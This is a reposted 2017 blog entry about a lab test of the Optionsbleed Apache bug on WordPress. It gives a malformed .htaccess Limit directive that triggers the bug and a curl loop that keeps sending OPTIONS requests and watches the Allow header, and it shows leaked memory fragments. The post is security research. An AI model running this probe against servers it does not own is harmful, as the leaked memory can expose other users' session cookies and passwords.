Monday, 25 September 2017

The Optionsbleed Apache Vulnerability and WordPress


During the weekend our CTO Jonas Lejon has been doing some research into the most recent Apache vulnerability named Optionsbleed. The Optionsbleed vulnerability is a bug in the Apache webserver and makes it possible for an attacker to read remote webserver memory such as session cookies, password etc. The Apache is a very common webserver according to w3techs:
Apache is used by 48.9% of all the websites whose web server we know
In our lab we set up a Apache webserver, installed WordPress and added the following line to .htaccess:
<Limit GET POST PUT REQUEST WPSCANS MPUT OKASDOAKSDOKASDIJ 12U1UH2OIEJ12OPEJOI IDJAIOSDJIOjd>
Allow from all
</Limit>
The above lines would probably trigger the vulnerability since the Limit-line contains some spelling errors.
With the following command line I was monitoring the Allow-header output to see if it returned something odd:
while true; do curl -sI -X OPTIONS http://hostname.dev/readme.html|grep "Allow:";sleep 0.1; done
Then I started to do different Admin-related tasks such as login, logout and uploading. And sometimes I would se different data showing up in the curl-request such as:
Allow: GET,HEAD,POST,,sync-upload.php HTTP/1.1,HEAD,OPTIONS,,HEAD
Source: https://managewp.org/articles/16181/the-optionsbleed-apache-vulnerability-and-wordpress




source https://williechiu40.wordpress.com/2017/09/25/the-optionsbleed-apache-vulnerability-and-wordpress/

No comments:

Post a Comment